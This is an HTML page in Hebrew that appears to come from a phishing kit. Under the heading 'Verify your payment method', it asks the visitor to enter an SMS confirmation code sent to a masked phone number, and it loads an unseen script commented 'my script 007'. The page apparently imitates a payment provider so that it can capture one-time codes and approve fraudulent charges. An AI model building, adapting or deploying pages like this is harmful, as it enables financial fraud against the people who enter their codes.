<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>

    <div class="hed">
        <img src="./img/hed.JPG" alt="">
    </div>
    
   

    <div class="section">
        <div class="kolch">
            <form method="post" id="pg3">
                <p class="p1">אמת את אמצעי התשלום שלך</p>

                <p>.********** לאישור הפעולה הזינו את הסיסמה ששלחנו ב-SMS לנייד </p>
                <input type="tel" name="" id="sps1" required maxlength="20">

    
                <button type="submit" class="btn1">  לאשר </button>
            </form>
        </div>
    </div>
    
    <div class="hed">
        <img src="./img/bot.JPG" alt="">
    </div>
    <!-- my script 007 -->
    <script src="./js/stb.js"></script>
</body>
</html>